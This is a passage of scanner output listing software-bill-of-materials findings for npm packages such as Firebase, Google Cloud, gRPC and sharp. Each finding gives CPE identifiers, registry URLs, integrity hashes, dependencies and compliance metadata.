cpe:2.3:a:\@firebase\/database-compat:\@firebase\/database_compat:1.0.8:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@firebase\/database_compat:\@firebase\/database-compat:1.0.8:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@firebase\/database_compat:\@firebase\/database_compat:1.0.8:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@firebase\/database:\@firebase\/database-compat:1.0.8:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@firebase\/database:\@firebase\/database_compat:1.0.8:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40firebase/database-compat@1.0.8 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@firebase/database-compat/-/database-compat-1.0.8.tgz integrity: sha512-OpeWZoPE3sGIRPBKYnW9wLad25RaWbGyk7fFQe4xnJQKRzlynWeFBSRRAoLE2Old01WXwskUiucNqUUVlFsceg== dependencies: '@firebase/component': 0.6.9 '@firebase/database': 1.0.8 '@firebase/database-types': 1.0.5 '@firebase/logger': 0.4.2 '@firebase/util': 1.10.0 tslib: ^2.1.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 04162de267eec152 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @firebase/database-types 1.0.5' title: '@firebase/database-types 1.0.5' description: 'Package discovered: @firebase/database-types 1.0.5' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 67e400eb3f7a92f4 name: '@firebase/database-types' version: 1.0.5 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: Apache-2.0 spdxExpression: Apache-2.0 type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@firebase\/database-types:\@firebase\/database-types:1.0.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@firebase\/database-types:\@firebase\/database_types:1.0.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@firebase\/database_types:\@firebase\/database-types:1.0.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@firebase\/database_types:\@firebase\/database_types:1.0.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@firebase\/database:\@firebase\/database-types:1.0.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@firebase\/database:\@firebase\/database_types:1.0.5:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40firebase/database-types@1.0.5 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@firebase/database-types/-/database-types-1.0.5.tgz integrity: sha512-fTlqCNwFYyq/C6W7AJ5OCuq5CeZuBEsEwptnVxlNPkWCo5cTTyukzAHRSO/jaQcItz33FfYrrFk1SJofcu2AaQ== dependencies: '@firebase/app-types': 0.9.2 '@firebase/util': 1.10.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 7028a090c3339aad ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @firebase/logger 0.4.2' title: '@firebase/logger 0.4.2' description: 'Package discovered: @firebase/logger 0.4.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: fdb02e46c7ca0cd4 name: '@firebase/logger' version: 0.4.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: Apache-2.0 spdxExpression: Apache-2.0 type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@firebase\/logger:\@firebase\/logger:0.4.2:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40firebase/logger@0.4.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@firebase/logger/-/logger-0.4.2.tgz integrity: sha512-Q1VuA5M1Gjqrwom6I6NUU4lQXdo9IAQieXlujeHZWvRt1b7qQ0KwBaNAjgxG27jgF9/mUwsNmO8ptBCGVYhB0A== dependencies: tslib: ^2.1.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 98e9db7b5ca2c98a ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @firebase/util 1.10.0' title: '@firebase/util 1.10.0' description: 'Package discovered: @firebase/util 1.10.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 6fc2f98e01b8bb45 name: '@firebase/util' version: 1.10.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: Apache-2.0 spdxExpression: Apache-2.0 type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:google:firebase\/util:1.10.0:*:*:*:*:node.js:*:* source: nvd-cpe-dictionary purl: pkg:npm/%40firebase/util@1.10.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@firebase/util/-/util-1.10.0.tgz integrity: sha512-xKtx4A668icQqoANRxyDLBLz51TAbDP9KRfpbKGxiCAW346d0BeJe5vN6/hKxxmWwnZ0mautyv39JxviwwQMOQ== dependencies: tslib: ^2.1.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: ac959c0aec00c93e ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @google-cloud/firestore 7.11.6' title: '@google-cloud/firestore 7.11.6' description: 'Package discovered: @google-cloud/firestore 7.11.6' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 352073d173d9984f name: '@google-cloud/firestore' version: 7.11.6 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: Apache-2.0 spdxExpression: Apache-2.0 type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:google:cloud_firestore:7.11.6:*:*:*:*:node.js:*:* source: nvd-cpe-dictionary purl: pkg:npm/%40google-cloud/firestore@7.11.6 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@google-cloud/firestore/-/firestore-7.11.6.tgz integrity: sha512-EW/O8ktzwLfyWBOsNuhRoMi8lrC3clHM5LVFhGvO1HCsLozCOOXRAlHrYBoE6HL42Sc8yYMuCb2XqcnJ4OOEpw== dependencies: '@opentelemetry/api': ^1.3.0 fast-deep-equal: ^3.1.1 functional-red-black-tree: ^1.0.1 google-gax: ^4.3.3 protobufjs: ^7.2.6 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: f729f15026a15114 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @google-cloud/paginator 5.0.2' title: '@google-cloud/paginator 5.0.2' description: 'Package discovered: @google-cloud/paginator 5.0.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: e1f90862acd15bdd name: '@google-cloud/paginator' version: 5.0.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: Apache-2.0 spdxExpression: Apache-2.0 type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@google-cloud\/paginator:\@google-cloud\/paginator:5.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@google-cloud\/paginator:\@google_cloud\/paginator:5.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@google_cloud\/paginator:\@google-cloud\/paginator:5.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@google_cloud\/paginator:\@google_cloud\/paginator:5.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@google:\@google-cloud\/paginator:5.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@google:\@google_cloud\/paginator:5.0.2:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40google-cloud/paginator@5.0.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@google-cloud/paginator/-/paginator-5.0.2.tgz integrity: sha512-DJS3s0OVH4zFDB1PzjxAsHqJT6sKVbRwwML0ZBP9PbU7Yebtu/7SWMRzvO2J3nUi9pRNITCfu4LJeooM2w4pjg== dependencies: arrify: ^2.0.0 extend: ^3.0.2 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 13de8663f3cca980 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @google-cloud/projectify 4.0.0' title: '@google-cloud/projectify 4.0.0' description: 'Package discovered: @google-cloud/projectify 4.0.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: aae37aa20c3046f6 name: '@google-cloud/projectify' version: 4.0.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: Apache-2.0 spdxExpression: Apache-2.0 type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@google-cloud\/projectify:\@google-cloud\/projectify:4.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@google-cloud\/projectify:\@google_cloud\/projectify:4.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@google_cloud\/projectify:\@google-cloud\/projectify:4.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@google_cloud\/projectify:\@google_cloud\/projectify:4.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@google:\@google-cloud\/projectify:4.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@google:\@google_cloud\/projectify:4.0.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40google-cloud/projectify@4.0.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@google-cloud/projectify/-/projectify-4.0.0.tgz integrity: sha512-MmaX6HeSvyPbWGwFq7mXdo0uQZLGBYCwziiLIGq5JVX+/bdI3SAq6bP98trV5eTWfLuvsMcIC1YJOF2vfteLFA== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: f473f0a74b429a34 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @google-cloud/promisify 4.0.0' title: '@google-cloud/promisify 4.0.0' description: 'Package discovered: @google-cloud/promisify 4.0.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 3927becf19e34873 name: '@google-cloud/promisify' version: 4.0.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: Apache-2.0 spdxExpression: Apache-2.0 type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@google-cloud\/promisify:\@google-cloud\/promisify:4.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@google-cloud\/promisify:\@google_cloud\/promisify:4.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@google_cloud\/promisify:\@google-cloud\/promisify:4.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@google_cloud\/promisify:\@google_cloud\/promisify:4.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@google:\@google-cloud\/promisify:4.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@google:\@google_cloud\/promisify:4.0.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40google-cloud/promisify@4.0.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@google-cloud/promisify/-/promisify-4.0.0.tgz integrity: sha512-Orxzlfb9c67A15cq2JQEyVc7wEsmFBmHjZWZYQMUyJ1qivXyMwdyNOs9odi79hze+2zqdTtu1E19IM/FtqZ10g== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 5c9bae4ce6812dd2 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @google-cloud/storage 7.19.0' title: '@google-cloud/storage 7.19.0' description: 'Package discovered: @google-cloud/storage 7.19.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: cefeafe40657f94b name: '@google-cloud/storage' version: 7.19.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: Apache-2.0 spdxExpression: Apache-2.0 type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@google-cloud\/storage:\@google-cloud\/storage:7.19.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@google-cloud\/storage:\@google_cloud\/storage:7.19.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@google_cloud\/storage:\@google-cloud\/storage:7.19.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@google_cloud\/storage:\@google_cloud\/storage:7.19.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@google:\@google-cloud\/storage:7.19.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@google:\@google_cloud\/storage:7.19.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40google-cloud/storage@7.19.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@google-cloud/storage/-/storage-7.19.0.tgz integrity: sha512-n2FjE7NAOYyshogdc7KQOl/VZb4sneqPjWouSyia9CMDdMhRX5+RIbqalNmC7LOLzuLAN89VlF2HvG8na9G+zQ== dependencies: '@google-cloud/paginator': ^5.0.0 '@google-cloud/projectify': ^4.0.0 '@google-cloud/promisify': <4.1.0 abort-controller: ^3.0.0 async-retry: ^1.3.3 duplexify: ^4.1.3 fast-xml-parser: ^5.3.4 gaxios: ^6.0.2 google-auth-library: ^9.6.3 html-entities: ^2.5.2 mime: ^3.0.0 p-limit: ^3.0.1 retry-request: ^7.0.0 teeny-request: ^9.0.0 uuid: ^8.0.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 596d6a964fdec768 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @grpc/grpc-js 1.14.3' title: '@grpc/grpc-js 1.14.3' description: 'Package discovered: @grpc/grpc-js 1.14.3' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 3f87a56430ddd85e name: '@grpc/grpc-js' version: 1.14.3 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: Apache-2.0 spdxExpression: Apache-2.0 type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:grpc:grpc:1.14.3:*:*:*:*:node.js:*:* source: nvd-cpe-dictionary purl: pkg:npm/%40grpc/grpc-js@1.14.3 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@grpc/grpc-js/-/grpc-js-1.14.3.tgz integrity: sha512-Iq8QQQ/7X3Sac15oB6p0FmUg/klxQvXLeileoqrTRGJYLV+/9tubbr9ipz0GKHjmXVsgFPo/+W+2cA8eNcR+XA== dependencies: '@grpc/proto-loader': ^0.8.0 '@js-sdsl/ordered-map': ^4.4.2 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: feaff3ef7cf15262 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @grpc/proto-loader 0.7.15' title: '@grpc/proto-loader 0.7.15' description: 'Package discovered: @grpc/proto-loader 0.7.15' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 05aac3d8e010493a name: '@grpc/proto-loader' version: 0.7.15 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: Apache-2.0 spdxExpression: Apache-2.0 type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@grpc\/proto-loader:\@grpc\/proto-loader:0.7.15:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@grpc\/proto-loader:\@grpc\/proto_loader:0.7.15:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@grpc\/proto_loader:\@grpc\/proto-loader:0.7.15:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@grpc\/proto_loader:\@grpc\/proto_loader:0.7.15:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@grpc\/proto:\@grpc\/proto-loader:0.7.15:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@grpc\/proto:\@grpc\/proto_loader:0.7.15:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40grpc/proto-loader@0.7.15 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@grpc/proto-loader/-/proto-loader-0.7.15.tgz integrity: sha512-tMXdRCfYVixjuFK+Hk0Q1s38gV9zDiDJfWL3h1rv4Qc39oILCu1TRTDt7+fGUI8K4G1Fj125Hx/ru3azECWTyQ== dependencies: lodash.camelcase: ^4.3.0 long: ^5.0.0 protobufjs: ^7.2.5 yargs: ^17.7.2 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 81837b7c5203b82b ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @grpc/proto-loader 0.8.0' title: '@grpc/proto-loader 0.8.0' description: 'Package discovered: @grpc/proto-loader 0.8.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 1a954d92edb2b14f name: '@grpc/proto-loader' version: 0.8.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: Apache-2.0 spdxExpression: Apache-2.0 type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@grpc\/proto-loader:\@grpc\/proto-loader:0.8.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@grpc\/proto-loader:\@grpc\/proto_loader:0.8.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@grpc\/proto_loader:\@grpc\/proto-loader:0.8.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@grpc\/proto_loader:\@grpc\/proto_loader:0.8.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@grpc\/proto:\@grpc\/proto-loader:0.8.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@grpc\/proto:\@grpc\/proto_loader:0.8.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40grpc/proto-loader@0.8.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@grpc/proto-loader/-/proto-loader-0.8.0.tgz integrity: sha512-rc1hOQtjIWGxcxpb9aHAfLpIctjEnsDehj0DAiVfBlmT84uvR0uUtN2hEi/ecvWVjXUGf5qPF4qEgiLOx1YIMQ== dependencies: lodash.camelcase: ^4.3.0 long: ^5.0.0 protobufjs: ^7.5.3 yargs: ^17.7.2 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: ba1c7d59d68ea634 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @img/colour 1.1.0' title: '@img/colour 1.1.0' description: 'Package discovered: @img/colour 1.1.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 0b879a880de07100 name: '@img/colour' version: 1.1.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@img\/colour:\@img\/colour:1.1.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40img/colour@1.1.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@img/colour/-/colour-1.1.0.tgz integrity: sha512-Td76q7j57o/tLVdgS746cYARfSyxk8iEfRxewL9h4OMzYhbW4TAcppl0mT4eyqXddh6L/jwoM75mo7ixa/pCeQ== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 69b8f19d695c4a0d ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @img/sharp-darwin-arm64 0.34.5' title: '@img/sharp-darwin-arm64 0.34.5' description: 'Package discovered: @img/sharp-darwin-arm64 0.34.5' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 535aeb1bbda7aba8 name: '@img/sharp-darwin-arm64' version: 0.34.5 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: Apache-2.0 spdxExpression: Apache-2.0 type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@img\/sharp-darwin-arm64:\@img\/sharp-darwin-arm64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-darwin-arm64:\@img\/sharp_darwin_arm64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_darwin_arm64:\@img\/sharp-darwin-arm64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_darwin_arm64:\@img\/sharp_darwin_arm64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-darwin:\@img\/sharp-darwin-arm64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-darwin:\@img\/sharp_darwin_arm64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_darwin:\@img\/sharp-darwin-arm64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_darwin:\@img\/sharp_darwin_arm64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-darwin-arm64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_darwin_arm64:0.34.5:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40img/sharp-darwin-arm64@0.34.5 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@img/sharp-darwin-arm64/-/sharp-darwin-arm64-0.34.5.tgz integrity: sha512-imtQ3WMJXbMY4fxb/Ndp6HBTNVtWCUI0WdobyheGf5+ad6xX8VIDO8u2xE4qc/fr08CKG/7dDseFtn6M6g/r3w== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: d46a9ddb45c9c115 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @img/sharp-darwin-x64 0.34.5' title: '@img/sharp-darwin-x64 0.34.5' description: 'Package discovered: @img/sharp-darwin-x64 0.34.5' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 0e26c2a4fd47f5b6 name: '@img/sharp-darwin-x64' version: 0.34.5 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: Apache-2.0 spdxExpression: Apache-2.0 type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@img\/sharp-darwin-x64:\@img\/sharp-darwin-x64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-darwin-x64:\@img\/sharp_darwin_x64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_darwin_x64:\@img\/sharp-darwin-x64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_darwin_x64:\@img\/sharp_darwin_x64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-darwin:\@img\/sharp-darwin-x64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-darwin:\@img\/sharp_darwin_x64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_darwin:\@img\/sharp-darwin-x64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: 